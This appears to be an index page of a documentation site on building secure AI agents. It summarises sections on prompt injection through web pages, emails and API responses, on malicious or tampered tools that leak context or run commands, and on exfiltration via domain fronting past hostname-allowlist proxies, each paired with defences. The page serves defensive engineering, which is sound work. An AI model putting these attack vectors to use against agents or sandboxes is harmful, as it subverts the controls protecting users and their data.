Skip to content

Security

Patterns and techniques for building agents that resist manipulation, protect sensitive data, and fail safely.

Threat Models

Threat models identify the structural conditions that make agent systems exploitable and prescribe architectural mitigations.

Prompt Injection

Prompt injection is the primary attack vector for agents that consume untrusted content. External instructions embedded in web pages, emails, documents, or API responses can redirect an agent's behavior at the model level.

Anti-pattern: Single-Layer Prompt Injection Defence — Relying on one safeguard leaves agents vulnerable to attack vectors that layer does not address

Sandboxing

Isolation limits what a compromised or misbehaving agent can affect.

Anti-pattern: Hostname-Allowlist Proxy: The TLS-Inspection Blind Spot — A hostname-allowlist proxy without TLS termination enforces the client-supplied destination, not the actual destination; broad shared-CDN entries open domain-fronting and similar exfil paths

Data Protection

Preventing sensitive data from entering agent context is cheaper than scrubbing it after the fact.

Permissions

Excess permissions expand the blast radius of any failure or attack.

Code Injection

Code injection in multi-agent pipelines exploits agent trust in code it reads as input, distinct from prompt injection against a single agent.

Multi-Agent Propagation

Multi-agent systems with shared retrieval propagate adversarial content agent-to-agent. Defenses target the contagion channel and the per-agent detection signal.

PR-Time and Scheduled Review

Operational patterns that apply security agents to incoming changes and to resident codebase risk on different cadences.

  • Always-On Agentic PR Security Review — Pair a PR-time security reviewer with a scheduled whole-codebase scanner so new and resident risk both have continuous coverage; treat the reviewer agent itself as an injection target
  • Scanner-as-MCP-Server: Secret and Dependency Scans as Typed Agent Tools — Ship the security scanner as an MCP server so the agent invokes typed scans pre-commit and reasons over structured findings; qualified by five failure modes including agent-skips-scan and lethal-trifecta closure on the scanner principal

Tool Invocation

Tool invocation exposes attack surfaces distinct from prompt injection. Malicious tools exploit argument generation and return processing to leak context and execute arbitrary commands.

Supply Chain

Agents dynamically load tools from MCP servers, plugins, and registries at runtime. A tampered tool inherits the agent's full permissions.

Defense in Depth

No single safety mechanism is sufficient. Layered defenses ensure that failure of one layer does not compromise the agent.

Economics

Sizing frames for pre-release security review when vulnerability discovery scales with inference spend.

  • Security Budget as Token Economics — Treat hardening as a budget-allocation decision: AISI's Mythos evaluation shows no diminishing returns inside 100M tokens per attempt, but the outspend frame applies only where the search curve is still climbing and triage capacity absorbs findings

Deployment Models

Release patterns for capabilities whose offense-defense asymmetry makes broad release the wrong default.

Feedback